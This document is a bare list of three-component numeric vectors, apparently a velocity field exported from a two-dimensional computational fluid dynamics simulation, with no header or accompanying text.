(-0.0021529660142 0.000662514473787 0)
(-0.00210458216386 0.000796758942707 0)
(-0.00152708654884 0.000335124833128 0)
(0.00675392405498 0.0101849278796 0)
(0.0233915688587 0.0239303647949 0)
(0.0388660306375 0.0351817139901 0)
(0.0538600008996 0.0444189489443 0)
(0.0683910168645 0.0517029583775 0)
(0.0824786847318 0.0570906004507 0)
(0.0961606091337 0.0607406122853 0)
(0.109430515273 0.0628228427156 0)
(0.122238224545 0.0634904367212 0)
(0.134509062809 0.0628467296274 0)
(0.146185776929 0.0609160528373 0)
(0.157274943574 0.0576833152722 0)
(0.167833000658 0.053168852865 0)
(0.177906832195 0.0474253313989 0)
(0.18750766622 0.0404947826928 0)
(0.19662406431 0.0324044979371 0)
(0.205219139702 0.0231974088793 0)
(0.213202190266 0.0129554780372 0)
(0.220267335021 0.0018789740183 0)
(0.225560577115 -0.0100642684108 0)
(0.228713926706 -0.0233658190197 0)
(0.228868782513 -0.0388365997773 0)
(0.225316685498 -0.0572084287883 0)
(0.21703112526 -0.0791603039728 0)
(0.20235788123 -0.105424038371 0)
(0.1783615317 -0.136608566165 0)
(0.141639375933 -0.172862758388 0)
(0.0839208096267 -0.171528222141 0)
(-2.06020002872e-05 -0.00160317125683 0)
(-6.54111113541e-05 -0.00159938323789 0)
(-0.000110435957084 -0.00124271006778 0)
(-0.000224663336436 -0.00155864544175 0)
(-0.000281121593468 -0.00156491859352 0)
(-0.000336998802754 -0.0015598834591 0)
(-0.000372398826159 -0.00143829092705 0)
(-0.000473538287097 -0.00149592547472 0)
(-0.000487370578409 -0.00122286660251 0)
(-0.00054400819291 -0.00114479232854 0)
(-0.000625898936997 -0.00122894330209 0)
(-0.00067932366354 -0.00127666285713 0)
(-0.000778601134031 -0.00135165429006 0)
(-0.000790151675798 -0.00121641788789 0)
(-0.000854243451855 -0.00119194900205 0)
(-0.000936356397723 -0.00124309278225 0)
(-0.000995562080547 -0.00123990988493 0)
(-0.00103609581995 -0.00119191746651 0)
(-0.00110304433388 -0.00117498601915 0)
(-0.00115471053168 -0.00113350178901 0)
(-0.00120932200227 -0.00109230929301 0)
(-0.00127579502642 -0.00105966957647 0)
(-0.00134485383972 -0.000987545738872 0)
(-0.00137300806465 -0.0008650267392 0)
(-0.00143495488354 -0.000799465040136 0)
(-0.00145714537188 -0.000755083664702 0)
(-0.00152259073143 -0.000749492770503 0)
(-0.0016001500017 -0.000754933735944 0)
(-0.00170571746848 -0.000779418678724 0)
(-0.00173314978994 -0.000757003042162 0)
(-0.00178026007799 -0.000716243413824 0)
(-0.00180990747992 -0.000670595840672 0)
(-0.00185434693465 -0.000634159062455 0)
(-0.00190130384828 -0.000594948207484 0)
(-0.00195016052934 -0.000547766989691 0)
(-0.00200994208622 -0.000495761092044 0)
(-0.00205360961544 -0.000438641999697 0)
(-0.00209154365157 -0.000378809849034 0)
(-0.00212704072413 -0.000317601157712 0)
(-0.00215965263512 -0.000253279696082 0)
(-0.00219076305436 -0.000184547084812 8.6278973943e-29)
(-0.00221331111672 -0.000110197233156 -8.36952453304e-29)
(-0.00222337900939 -2.26475798617e-05 0)
(-0.00220695240249 7.98223532226e-05 0)
(-0.00219961005493 0.000178119685328 0)
(-0.00221960490558 0.000260283105944 0)
(-0.00222680431772 0.000334036245965 0)
(-0.0022416250077 0.000440812455766 0)
(-0.00218241733282 0.000598135282379 0)
(-0.00211707896533 0.000726464902426 0)
(-0.00147446438334 0.000216595557892 0)
(0.00539715827648 0.0102805202577 0)
(0.0234322297808 0.0265591655134 0)
(0.0396760607914 0.0397284426879 0)
(0.0554305925083 0.0506011437777 0)
(0.0707546643994 0.0593817203305 0)
(0.0855940467717 0.0661876207055 0)
(0.0999361855326 0.0711227309119 0)
(0.113795540171 0.0743235119711 0)
(0.127178279851 0.0759387154813 0)
(0.140073609765 0.0761029234239 0)
(0.152462834422 0.0749175599725 0)
(0.164337779665 0.0724398353375 0)
(0.175718625429 0.0686969746925 0)
(0.186649604595 0.0637155330981 0)
(0.197174118397 0.0575273377253 0)
(0.207315994854 0.0501539540301 0)
(0.217074462211 0.041599001634 0)
(0.226414540506 0.0318521615312 0)
(0.23522888415 0.0208859450208 0)
(0.24340629665 0.00864493199092 0)
(0.25013224684 -0.00512680041446 0)
(0.255522450737 -0.0207048789702 0)
(0.258885863306 -0.0390149070944 0)
(0.259625441469 -0.061068482069 0)
(0.256915894916 -0.0881500800116 0)
(0.249173567418 -0.122175513396 0)
(0.232976419486 -0.166224862708 0)
(0.196865188831 -0.227163891233 0)
(0.134564921581 -0.314302848567 0)
(-2.06337204169e-05 -0.00164689436549 0)
(-6.56786374075e-05 -0.00164215661096 0)
(-0.000122895849097 -0.0013460909576 0)
(-0.00023120671857 -0.00163338860095 0)
(-0.000266805350628 -0.00161300190529 0)
(-0.000314264278242 -0.00161498690171 0)
(-0.000371787410286 -0.00152991159342 0)
(-0.000453310720418 -0.00154140699159 0)
(-0.000471428249069 -0.00128572275956 0)
(-0.000537997917211 -0.00120333319796 0)
(-0.000622549746099 -0.00129313352209 0)
(-0.000673953914957 -0.00134115348647 0)
(-0.000769441744376 -0.0014146920909 0)
(-0.000786690756992 -0.0012732624825 0)
(-0.000853435804248 -0.0012542977115 0)
(-0.000931064826243 -0.00130354235756 0)
(-0.00098640855688 -0.00129693374944 0)
(-0.00102181399763 -0.00124511693722 0)
(-0.00108717147966 -0.00123197941226 0)
(-0.00113521524997 -0.00118660439658 0)
(-0.00118120689527 -0.00114070723281 0)
(-0.00125134761772 -0.00111973470182 0)
(-0.00130950730921 -0.00104491971333 0)
(-0.00134585436693 -0.000924598805354 0)
(-0.00141625115196 -0.000855608596357 0)
(-0.00144183867816 -0.000803817267244 0)
(-0.00150988124114 -0.000808233234405 0)
(-0.00158967921172 -0.000834666449293 0)
(-0.00169445619339 -0.000847428890612 0)
(-0.00172819710923 -0.000805360588254 0)
(-0.00175423277965 -0.000756383606261 0)
(-0.00181260056381 -0.000725550117789 0)
(-0.00186369713605 -0.000689239108572 0)
(-0.00190667052688 -0.000643549588386 0)
(-0.00192942895769 -0.00059388293676 0)
(-0.0019922477805 -0.000544941429138 0)
(-0.00204228953884 -0.000483635669193 0)
(-0.0020896121036 -0.00042023841502 0)
(-0.00213018253937 -0.00035395668815 0)
(-0.00216381972345 -0.000285573354444 0)
(-0.00219624318155 -0.000212630405583 0)
(-0.00222530204737 -0.000126020647666 0)
(-0.00221379461819 -1.79368242782e-05 0)
(-0.00219127038231 8.80062680565e-05 0)
(-0.00221248013009 0.000170896874866 0)
(-0.0022348859172 0.000242091405807 0)
(-0.00224508320301 0.000334254881104 0)
(-0.00220597875713 0.00048589905324 0)
(-0.0020856695484 0.000733814447445 0)
(-0.00147391191875 0.000168389047178 0)
(0.00177430823095 0.00834570710679 0)
(0.0220904294631 0.0279854603477 0)
(0.0390400729665 0.0432068195003 0)
(0.0554707959838 0.055893196497 0)
(0.0714683230318 0.0662971167462 0)
(0.0869738439144 0.074579119296 0)
(0.101947883691 0.0808681500021 0)
(0.116381373332 0.0852921081874 0)
(0.130287332716 0.0879919403087 0)
(0.143684996141 0.0891116639336 0)
(0.156591688141 0.088781703521 0)
(0.169024684244 0.0871068089952 0)
(0.181008561297 0.0841605099372 0)
(0.192581948361 0.0799901147704 0)
(0.203795513293 0.0746281183163 0)
(0.214700673007 0.0680961931881 0)
(0.225338201682 0.0603988127168 0)
(0.235731487195 0.0515155337686 0)
(0.245879338945 0.0413943095402 0)
(0.255741633359 0.0299380387015 0)
(0.265248073881 0.016964472575 0)
(0.274290649918 0.00222799163201 0)
(0.282275088049 -0.0147821694602 0)
(0.289434343965 -0.0348122528443 0)
(0.295495616935 -0.0590595774595 0)
(0.300391870543 -0.0891066222927 0)
(0.304185389276 -0.127457758976 0)
(0.308014389916 -0.178365661842 0)
(0.316403068046 -0.249874320541 0)
(0.341081119188 -0.353394920304 0)
(-2.01799114469e-05 -0.00168950479406 0)
(-6.91602686557e-05 -0.00168905180211 0)
(-0.000136846391956 -0.00144887937935 0)
(-0.000232117061088 -0.00168885881587 0)
(-0.000248572876432 -0.00164719306032 0)
(-0.000293272351179 -0.00166744155643 0)
(-0.000363832865471 -0.001619609002 0)
(-0.00041445000572 -0.00155801810636 0)
(-0.000460215577257 -0.00138378448548 0)
(-0.000531656308769 -0.00127277520611 0)
(-0.00061712568042 -0.00135549412793 0)
(-0.000666953559532 -0.0014034995113 0)
(-0.000757463532764 -0.00147524928161 0)
(-0.000776868967892 -0.00133291808003 0)
(-0.000846981162871 -0.00131697366864 0)
(-0.000922308520233 -0.00136016432934 0)
(-0.000975800980775 -0.00134874094247 0)
(-0.00100251045232 -0.00129368377708 0)
(-0.00106996549505 -0.00128960910538 0)
(-0.00111504307932 -0.00123752501562 0)
(-0.00114844953086 -0.00118153387965 0)
(-0.00122180125998 -0.00117407744084 0)
(-0.00127407733462 -0.00110411746504 0)
(-0.00131464082629 -0.000987320302936 0)
(-0.00139029523667 -0.00091569681036 0)
(-0.00142776827795 -0.000862614669246 0)
(-0.00148965422413 -0.000867041628714 0)
(-0.00157362534162 -0.000904706324921 0)
(-0.00161469486513 -0.000887930175249 0)
(-0.00170035979835 -0.000858248422892 0)
(-0.00173289192122 -0.000802534483714 0)
(-0.0017704640546 -0.000761504867786 0)
(-0.00179962593145 -0.000724001273423 0)
(-0.00188971417924 -0.000696129177039 0)
(-0.00193630597959 -0.000646557927777 0)
(-0.00197001921444 -0.000590783028976 0)
(-0.00202983976495 -0.000532499799685 0)
(-0.00207484429982 -0.000465334111837 0)
(-0.00212367547334 -0.000395364990081 0)
(-0.00216629038442 -0.000321759923747 8.3247025244e-29)
(-0.00220342624725 -0.000239256490272 -8.06817618292e-29)
(-0.00220939726943 -0.000129903356257 0)
(-0.00217353025854 -8.67329756158e-06 0)
(-0.00218093609491 8.73409905364e-05 0)
(-0.002207075733 0.000165971423585 0)
(-0.00220148553471 0.000254700807308 0)
(-0.00213101854978 0.000373010976898 0)
(-0.00208014450265 0.000484945609137 0)
(-0.00149313421249 0.000252642234374 0)
(-0.00351092038234 0.0047564405898 0)
(0.0200716425028 0.0280993794879 0)
(0.0372323107784 0.0452734547158 0)
(0.0541322191697 0.0599508041768 0)
(0.0707034651572 0.0721863812753 0)
(0.0867901500696 0.0821046360095 0)
(0.102326251088 0.0898534226887 0)
(0.117285594298 0.0955865860574 0)
(0.131668822982 0.0994603380887 0)
(0.145498417095 0.101631004148 0)
(0.158809141707 0.102248122605 0)
(0.171640895978 0.101445011064 0)
(0.184037227172 0.0993314183758 0)
(0.196047483523 0.0959901926438 0)
(0.207729074875 0.0914788688285 0)
(0.21914628144 0.0858340463031 0)
(0.2303650598 0.0790730378748 0)
(0.241447159555 0.0711902384948 0)
(0.252446182876 0.0621503540261 0)
(0.263404737462 0.0518792456942 0)
(0.274352069338 0.0402489161458 0)
(0.285294549053 0.0270498973835 0)
(0.296383026395 0.0119709475276 0)
(0.307161950454 -0.00563540765154 0)
(0.318320623046 -0.0260237243077 0)
(0.329998587786 -0.0504046067672 0)
(0.342798070482 -0.0801957388179 0)
(0.358059196051 -0.117291138081 0)
(0.378543123076 -0.164372535793 0)
(0.407627513214 -0.224858568373 0)
(0.466256363441 -0.294766796226 0)
(-1.92714170536e-05 -0.00172476005035 0)
(-7.11990503439e-05 -0.00174092532898 0)
(-0.000147238856852 -0.00154775217503 0)
(-0.000222308709209 -0.0017083034844 0)
(-0.000230337025979 -0.00165778690911 0)
(-0.000279814508804 -0.00171654620535 0)
(-0.000345538833253 -0.00168485851216 0)
(-0.000373401524525 -0.00154788303566 0)
(-0.000453984132919 -0.00147405343648 0)
(-0.000525362725096 -0.00133936028421 0)
(-0.000609004500862 -0.00141363284052 0)
(-0.000657585110791 -0.00146322157597 0)
(-0.000742230669272 -0.0015326433179 0)
(-0.000762606328123 -0.00139362673044 0)
(-0.000834133328043 -0.00138114489557 0)
(-0.000909494051516 -0.00141610425559 0)
(-0.000952586600839 -0.00138776750703 0)
(-0.000975671038241 -0.00133673298745 -1.19341753943e-28)
(-0.0010497587783 -0.00134821647658 1.23622462701e-28)
(-0.00109105121811 -0.0012851740764 0)
(-0.00111261308465 -0.00121483398069 0)
(-0.00118880702669 -0.00122021308991 0)
(-0.00124870353706 -0.00116556841387 0)
(-0.00128251775646 -0.00104985412543 0)
(-0.00136100693028 -0.000977742257888 0)
(-0.00141303055473 -0.000926008630414 0)
(-0.00146455094601 -0.000921503014754 0)
(-0.00156282057898 -0.000967469596991 0)
(-0.00157919060143 -0.000942145561728 0)
(-0.0016568656322 -0.000910413250599 0)
(-0.00169844869898 -0.000848848805864 0)
(-0.00178488310039 -0.000822446873296 0)
(-0.00181509546133 -0.000787131416147 0)
(-0.00184121006728 -0.000741145714415 0)
(-0.00191197896406 -0.000698435914425 0)
(-0.00196288758983 -0.000643540574321 0)
(-0.00201500036159 -0.000581898041751 0)
(-0.00206599018106 -0.000513290531716 0)
(-0.00211065845952 -0.000440289127229 0)
(-0.00216051687861 -0.000360011162278 0)
(-0.00219152171533 -0.000253693821976 0)
(-0.00215663376806 -0.000119837117032 0)
(-0.00214126013974 -3.54998930915e-06 0)
(-0.00216028843947 8.86231619591e-05 0)
(-0.00215686095529 0.000194331954104 0)
(-0.00208398958031 0.000331948123537 0)
(-0.00190484932713 0.000407877570489 0)
(-0.00169596380843 0.000227075451038 0)
(-0.00234555015731 -0.000587532840589 0)
(0.0166414650162 0.0246154607386 0)
(0.0343785815033 0.0449829795303 0)
(0.0515728353817 0.0622941584652 0)
(0.0685659814634 0.0767193177597 0)
(0.0851669455882 0.0885209091631 0)
(0.10121344102 0.0979046780094 0)
(0.116647752423 0.105068253086 0)
(0.131460210249 0.110205674426 0)
(0.145668470385 0.113502422566 0)
(0.159310832615 0.115132607063 0)
(0.172439070337 0.115255309878 0)
(0.185112536592 0.114009656846 0)
(0.197395568501 0.111510736938 0)
(0.209357399146 0.107847734654 0)
(0.221072700195 0.103084489694 0)
(0.232621056086 0.0972612685077 0)
(0.244085030897 0.0903952646865 0)
(0.255548193133 0.0824781827908 0)
(0.26709469948 0.0734710524764 0)
(0.278811173078 0.063296324067 0)
(0.290791879698 0.0518257252427 0)
(0.303151098841 0.0388621970535 0)
(0.316039170894 0.024105308718 0)
(0.329913025187 0.00726916236881 0)
(0.344364258429 -0.0125267649672 0)
(0.360701740995 -0.0353816095956 0)
(0.379618412437 -0.06240618466 0)
(0.40257138461 -0.094583441715 0)
(0.432305239886 -0.132685387398 0)
(0.469672119362 -0.177156218162 0)
(0.542749955455 -0.223341323135 0)
(-2.18298438398e-05 -0.00175294468784 0)
(-7.38585459339e-05 -0.00179568865304 0)
(-0.000144116917098 -0.00163882047714 0)
(-0.000204920485006 -0.00169332708882 0)
(-0.00023428795888 -0.00169440184403 -1.43551278261e-29)
(-0.000284700282074 -0.00175917063129 1.51619246483e-29)
(-0.000342493644742 -0.00175035316278 0)
(-0.000369732369766 -0.00159383594337 0)
(-0.00047420899299 -0.0016288507724 0)
(-0.000515191800887 -0.00141079528159 0)
(-0.000598107006992 -0.00146707096776 0)
(-0.00064710728827 -0.00152032612695 0)
(-0.000725587978487 -0.00158637119278 0)
(-0.000746764397446 -0.0014536198237 0)
(-0.000816125510139 -0.00144497706961 0)
(-0.000892459243313 -0.00147411038353 0)
(-0.000909945343672 -0.00139634251256 0)
(-0.000952307715037 -0.00137401349089 0)
(-0.00103413493977 -0.00140508406095 0)
(-0.00106425583081 -0.00132557525055 0)
(-0.00109264957674 -0.0012566444472 0)
(-0.00116513391896 -0.00125870620721 0)
(-0.0012490477367 -0.00123697048005 -1.20968078199e-28)
(-0.00126987410601 -0.00110920884687 0)
(-0.00133968310396 -0.00103669106353 0)
(-0.00140072784413 -0.000988932479874 0)
(-0.00144610417421 -0.00097669428386 0)
(-0.00154758086054 -0.00102245030288 0)
(-0.00156726401715 -0.000996528911496 0)
(-0.00162439306587 -0.000961847400468 0)
(-0.00166939016669 -0.00090952921996 0)
(-0.00176367383999 -0.000877451087633 0)
(-0.00179817313887 -0.000826666504604 0)
(-0.00184532962232 -0.000794765766277 0)
(-0.00188162808915 -0.000748762497656 0)
(-0.00193318908876 -0.000695129199747 0)
(-0.00199112506663 -0.000634553867473 0)
(-0.00204992987976 -0.000564070098374 0)
(-0.0021026865747 -0.00048706076676 0)
(-0.00214785609682 -0.000388872946304 0)
(-0.00213439238239 -0.000248871776566 0)
(-0.00210272441309 -0.000108346510798 0)
(-0.00210717939713 -2.73741702912e-07 0)
(-0.00211698441935 0.000104175929038 0)
(-0.00209314690149 0.000254428244181 0)
(-0.0019655048373 0.000397251917604 0)
(-0.0018692779213 0.000328876244702 0)
(-0.00219187941337 -0.00046254838475 0)
(0.00859631051875 0.0183535860713 0)
(0.0290663105945 0.0422690233377 0)
(0.0474161814272 0.0627126075402 0)
(0.0650316173657 0.0796833481373 0)
(0.0821545967291 0.0936146137867 0)
(0.0986993305558 0.10483204797 0)
(0.114588991999 0.11358301061 0)
(0.129801381715 0.120099641967 0)
(0.144351154651 0.124605421269 0)
(0.158277422309 0.127308977315 0)
(0.171637175627 0.128400413117 0)
(0.184499544708 0.128048779853 0)
(0.19694110932 0.126399555083 0)
(0.209043248975 0.123572762949 0)
(0.220891318551 0.119662359196 0)
(0.232574732312 0.114736857649 0)
(0.244187114589 0.10884046786 0)
(0.255826345159 0.101993510366 0)
(0.267595170149 0.0941911513344 0)
(0.279603411987 0.0854002494037 0)
(0.291972741609 0.0755543535586 0)
(0.304845255936 0.0645466688258 0)
(0.318398268525 0.0522211215466 0)
(0.332866655746 0.0383639071144 0)
(0.348611370579 0.0226909298619 0)
(0.366182156007 0.00488248235906 0)
(0.385752181737 -0.0157958088623 0)
(0.408870335944 -0.0389878746915 0)
(0.436609197097 -0.0652334754353 0)
(0.471207174827 -0.0946125645809 0)
(0.512311587102 -0.126417942425 0)
(0.587215048654 -0.157863879923 0)
(-2.7493949742e-05 -0.00180614864527 0)
(-7.82241816993e-05 -0.00184730486165 0)
(-0.000131075986392 -0.00171921746512 0)
(-0.000197620995237 -0.00174938517917 0)
(-0.000250722899403 -0.00175013092108 0)
(-0.00029669973113 -0.00179649931238 0)
(-0.000351215511419 -0.00180239075091 0)
(-0.00038079294912 -0.00163436289979 0)
(-0.000467192898018 -0.00168793328348 0)
(-0.000497698351792 -0.00148233433619 0)
(-0.000582350028602 -0.00152269104875 0)
(-0.000635595215374 -0.00157687399703 0)
(-0.000709247688341 -0.00163696107244 0)
(-0.000732515043997 -0.00151244511761 0)
(-0.00080057344361 -0.00150602892422 0)
(-0.000874414172685 -0.00153067483348 0)
(-0.000901113004877 -0.00145093051703 0)
(-0.000952751639979 -0.00143006524179 0)
(-0.00103238370855 -0.00145922612518 0)
(-0.00104703480561 -0.0013603668561 0)
(-0.00110144553686 -0.00131565124461 0)
(-0.0011862878533 -0.0013211452523 0)
(-0.00124053278818 -0.00127854824524 1.15361455216e-28)
(-0.00132628255943 -0.00121610813773 0)
(-0.00134056287801 -0.00109058627617 0)
(-0.00140685152207 -0.00104324653671 0)
(-0.00144234118716 -0.00102823238137 0)
(-0.00153690076982 -0.00107169415979 0)
(-0.00155789641401 -0.00104516610499 0)
(-0.00161000081288 -0.00101323384217 0)
(-0.00165124139692 -0.000966632549112 0)
(-0.00170787971751 -0.000923355142419 0)
(-0.00179557318546 -0.000890922474956 0)
(-0.00183794155334 -0.000844045130601 0)
(-0.00187231969572 -0.000793569601521 0)
(-0.00191038138662 -0.000743715025325 0)
(-0.00196193416229 -0.000688240177974 0)
(-0.00201933410084 -0.00061714432927 0)
(-0.00208602231948 -0.0005288760818 0)
(-0.00209685400888 -0.000395209581166 0)
(-0.00206773541583 -0.000236557823476 0)
(-0.00205876672277 -0.000103034213203 0)
(-0.00207478914472 2.40493866549e-06 0)
(-0.00209342612645 0.000117865209508 0)
(-0.00205348502655 0.000226827920983 0)
(-0.0021348847281 0.000126117329679 0)
(-0.00293367833161 -0.000284567816393 0)
(-0.00276116815048 0.00913667574009 0)
(0.0226829706142 0.0382118594316 0)
(0.0416496733573 0.0611583814004 0)
(0.0600302878273 0.0808065097569 0)
(0.0777889638626 0.0971466502298 0)
(0.094856849994 0.110435889679 0)
(0.11120502293 0.120964972714 0)
(0.126813200051 0.129008573416 0)
(0.141690322911 0.134830597652 0)
(0.155875348009 0.138680381268 0)
(0.169429027141 0.140786346679 0)
(0.18242706259 0.141352466206 0)
(0.1949549581 0.140556650214 0)
(0.207104168264 0.138549926811 0)
(0.21896978967 0.135456275565 0)
(0.230649724603 0.131373226175 0)
(0.24224487331 0.126373094411 0)
(0.253859925194 0.120504405212 0)
(0.265604667947 0.113792859554 0)
(0.277596191629 0.106241338767 0)
(0.289962663729 0.0978288233103 0)
(0.302849470881 0.088508402669 0)
(0.316428716883 0.0782047507567 0)
(0.330913463148 0.0668119222372 0)
(0.34657829572 0.054193580578 0)
(0.363786092182 0.0401873872504 0)
(0.383062913897 0.0246507919832 0)
(0.40515247382 0.0074747197736 0)
(0.430503867863 -0.0120694469279 0)
(0.46075122953 -0.0329644246855 0)
(0.497503074185 -0.0547498248347 0)
(0.539822741807 -0.0763844475177 0)
(0.610991420161 -0.0965946291354 0)
(-2.83818569202e-05 -0.00187631421092 0)
(-7.58006238682e-05 -0.00189007990113 0)
(-0.000115489839978 -0.0017816309504 0)
(-0.000190176655098 -0.00181384617934 0)
(-0.000257234938872 -0.00179988435687 0)
(-0.000299904130592 -0.0018325263722 0)
(-0.000353077259091 -0.00185135798205 0)
(-0.000382552858476 -0.00167607711714 0)
(-0.000458369375601 -0.00171815834444 0)
(-0.000493927947022 -0.00155628683826 0)
(-0.000570289897328 -0.001578859244 0)
(-0.000625662268212 -0.00163348162839 0)
(-0.00069397802585 -0.00168502696956 0)
(-0.000719575069368 -0.00157069578178 0)
(-0.0007875827597 -0.00156590027611 0)
(-0.000857809304011 -0.00158304549486 0)
(-0.000895995436863 -0.00150929904388 0)
(-0.000954094852789 -0.00148671005016 0)
(-0.00103499746679 -0.00151046123229 0)
(-0.00105203399204 -0.00141565286012 0)
(-0.00115190799745 -0.00142515350371 0)
(-0.00119982712007 -0.00138224740961 0)
(-0.00125023190373 -0.0013324266248 0)
(-0.00131012562698 -0.00126134519999 0)
(-0.00138071862371 -0.00118550578381 0)
(-0.00145367034306 -0.00113144807735 0)
(-0.00145753462643 -0.00107842631339 0)
(-0.00153008508818 -0.00111228200511 0)
(-0.00156514251878 -0.00109946070301 0)
(-0.00160430008271 -0.00106036681398 0)
(-0.0016430693132 -0.00101406964769 0)
(-0.00167604348922 -0.000972529369324 0)
(-0.00175063043284 -0.000942315375648 0)
(-0.00180962446657 -0.00089717217567 0)
(-0.00186223998799 -0.000846449039892 0)
(-0.00190667996119 -0.000794608251494 0)
(-0.00194535416964 -0.000738764073136 0)
(-0.00199160299002 -0.000665587047979 0)
(-0.00204867678494 -0.000555949823766 0)
(-0.00203607500624 -0.000392083492354 0)
(-0.00202371350832 -0.000232448689821 0)
(-0.0020333384115 -0.000107763640724 0)
(-0.00206991842096 -8.02179175065e-06 0)
(-0.00207942207941 5.39667473554e-05 0)
(-0.00215136451664 -2.04349302341e-05 0)
(-0.00296238027958 -0.00056167191069 0)
(-0.00234734579316 -0.000922621350903 0)
(0.0156473599288 0.0301251196161 0)
(0.0351972956676 0.0568979480824 0)
(0.0538647727355 0.0797244357364 0)
(0.0721243463981 0.0988128820133 0)
(0.0897449539009 0.114482899932 0)
(0.106579030789 0.127035526558 0)
(0.122597090333 0.136792029175 0)
(0.137808187408 0.144068006749 0)
(0.152249451775 0.149160387571 0)
(0.165983588669 0.152342069997 0)
(0.179091676335 0.15385801502 0)
(0.191666538099 0.153923172782 0)
(0.203807972569 0.152722124705 0)
(0.21561949921 0.150409749799 0)
(0.227206518102 0.147112525695 0)
(0.238675782402 0.14293031123 0)
(0.250135929337 0.137938434863 0)
(0.26169882431 0.132189804125 0)
(0.273481665055 0.125716705407 0)
(0.285610055656 0.118532073759 0)
(0.298222466409 0.110630260292 0)
(0.311476610051 0.101987601584 0)
(0.325558355466 0.0925633916872 0)
(0.340693891489 0.0823023152458 0)
(0.3571657745 0.0711401552604 0)
(0.375333247118 0.059015465885 0)
(0.395655519977 0.0458895164581 0)
(0.418716736912 0.0318170665069 0)
(0.445401284143 0.0171854674676 0)
(0.4763292385 0.00166579757699 0)
(0.512822521839 -0.0141771922382 0)
(0.554321872754 -0.0286415942139 0)
(0.620803572649 -0.0405428349668 0)
(-2.53816431751e-05 -0.00193293446586 0)
(-6.83572381753e-05 -0.0019326814945 0)
(-0.000107308937023 -0.00183529270215 0)
(-0.000186052086223 -0.00194057778707 0)
(-0.000245176555201 -0.00185425993955 0)
(-0.000293903094399 -0.00187789894615 0)
(-0.000347285801332 -0.0018999424501 0)
(-0.00038174432925 -0.00173863630473 0)
(-0.000461411782038 -0.00177761962768 0)
(-0.000497692777567 -0.0016238532484 0)
(-0.000563663676524 -0.00163075470427 0)
(-0.000618233117693 -0.00168887470835 0)
(-0.000679025350121 -0.00172938240058 0)
(-0.000706860527203 -0.00162841476117 0)
(-0.000774412323873 -0.00162513353282 0)
(-0.000839028903467 -0.001633837234 0)
(-0.000887182487725 -0.00157341719808 0)
(-0.000947335009999 -0.00154412487796 0)
(-0.00102845382498 -0.00156313037411 0)
(-0.00104836079488 -0.00147018124027 0)
(-0.00114365585211 -0.00148005812632 0)
(-0.00117328504291 -0.00142091398229 0)
(-0.00123325090048 -0.00138760403592 0)
(-0.0012827839947 -0.0013182965001 0)
(-0.00132575099682 -0.00122041064432 0)
(-0.0013940368902 -0.00115762266815 0)
(-0.00145521751227 -0.00113109491494 0)
(-0.00151192391066 -0.00115279353629 0)
(-0.00156523353798 -0.00115154932454 0)
(-0.00159558433715 -0.00110300865453 0)
(-0.0016408570761 -0.00105611952526 0)
(-0.00167586822374 -0.00101691986173 0)
(-0.0017109509013 -0.000979727039554 0)
(-0.00177757950055 -0.00094795021308 0)
(-0.0018076468159 -0.000887702353193 0)
(-0.00187619801288 -0.000842684057009 0)
(-0.00192566223185 -0.000787279141418 0)
(-0.00196890486371 -0.000706020054999 0)
(-0.00200200336417 -0.000572133360608 0)
(-0.00199300895512 -0.000395788353665 0)
(-0.0020026768265 -0.000244214174508 0)
(-0.00203294962751 -0.000137843162629 0)
(-0.00209786559057 -6.81979739076e-05 0)
(-0.00220529909139 -5.16793686653e-05 0)
(-0.00228947048777 -0.000294228716573 0)
(-0.00244721433789 -0.00062405393981 0)
(0.00188995809684 0.0175990308409 0)
(0.0267159519855 0.0494093657706 0)
(0.0464326921609 0.0760834104962 0)
(0.0652378117525 0.0983613065578 0)
(0.0834052226956 0.116728650313 0)
(0.100762840521 0.131586621396 0)
(0.117229229261 0.143289608144 0)
(0.132801915208 0.152197579329 0)
(0.147517885088 0.15866091084 0)
(0.16144145183 0.163004231973 0)
(0.17465801714 0.165520006628 0)
(0.187267085219 0.166466007985 0)
(0.1993762157 0.166064824842 0)
(0.211096727924 0.164504954946 0)
(0.222540994563 0.161942910074 0)
(0.233821130941 0.158505868397 0)
(0.245048915858 0.154294604634 0)
(0.256336739956 0.149386506366 0)
(0.267799400342 0.143838494428 0)
(0.279556676319 0.137689696326 0)
(0.291736777284 0.130963828413 0)
(0.304480881167 0.123671426591 0)
(0.317949045126 0.115812293252 0)
(0.332327771973 0.107378796903 0)
(0.347839442493 0.0983610229307 0)
(0.364753596809 0.0887552758582 0)
(0.383399572874 0.078578002403 0)
(0.404179260784 0.0678879378885 0)
(0.427577478295 0.056818893802 0)
(0.454139203073 0.0456276018567 0)
(0.484511993422 0.0348906339312 0)
(0.519606078939 0.0255334023806 0)
(0.558632740107 0.018479176264 0)
(0.618445562137 0.0147997450032 0)
(-2.81028703615e-05 -0.00197978497037 0)
(-6.42098547195e-05 -0.00197763947286 0)
(-0.000106150215075 -0.00190020440763 0)
(-0.000176211583629 -0.00199374754934 0)
(-0.000223318608564 -0.00191253403597 0)
(-0.000280950873333 -0.00193227603311 0)
(-0.000337095912359 -0.00194834066331 0)
(-0.000379610892379 -0.00180797349918 0)
(-0.000456356581846 -0.00183049898854 0)
(-0.00049769513949 -0.00168941009643 0)
(-0.000557693189338 -0.00167684755781 0)
(-0.000611205588086 -0.001741760062 0)
(-0.000662883032432 -0.00176799238094 0)
(-0.000695873733811 -0.0016849111875 0)
(-0.000761805691458 -0.00168267039698 0)
(-0.000818384954141 -0.00168285250693 0)
(-0.000876493151904 -0.00163912341683 0)
(-0.000935759834515 -0.00160038295109 0)
(-0.00101311357649 -0.00161533355113 0)
(-0.00103530332944 -0.00152819548949 0)
(-0.00111512608207 -0.00152818259229 0)
(-0.00113948650654 -0.0014549612242 0)
(-0.00118695041416 -0.00141040179702 0)
(-0.00127341566777 -0.0013918557081 0)
(-0.00131298974951 -0.00129429422849 0)
(-0.00137841986722 -0.00121854425637 0)
(-0.00141860636964 -0.00116146540042 0)
(-0.00150579255627 -0.00119901543961 0)
(-0.00156337407693 -0.00120726504916 0)
(-0.00158548446777 -0.00114607052221 0)
(-0.00163507676499 -0.00109868194938 0)
(-0.0016972823024 -0.00106930572882 0)
(-0.00173057166346 -0.00102999455504 0)
(-0.0017742350485 -0.000990865395566 0)
(-0.00180008116595 -0.000939271479787 0)
(-0.00185305501769 -0.000893726068897 0)
(-0.00190207941255 -0.00083441370883 0)
(-0.00194674352194 -0.000741978621724 0)
(-0.00196082463019 -0.000587111883534 0)
(-0.00196086622827 -0.000408809898774 0)
(-0.0019854861499 -0.000270812866373 0)
(-0.0020389435822 -0.000207051838299 5.27649797412e-29)
(-0.00217051944535 -0.000218740581046 0)
(-0.00227399708359 -0.000325253620352 0)
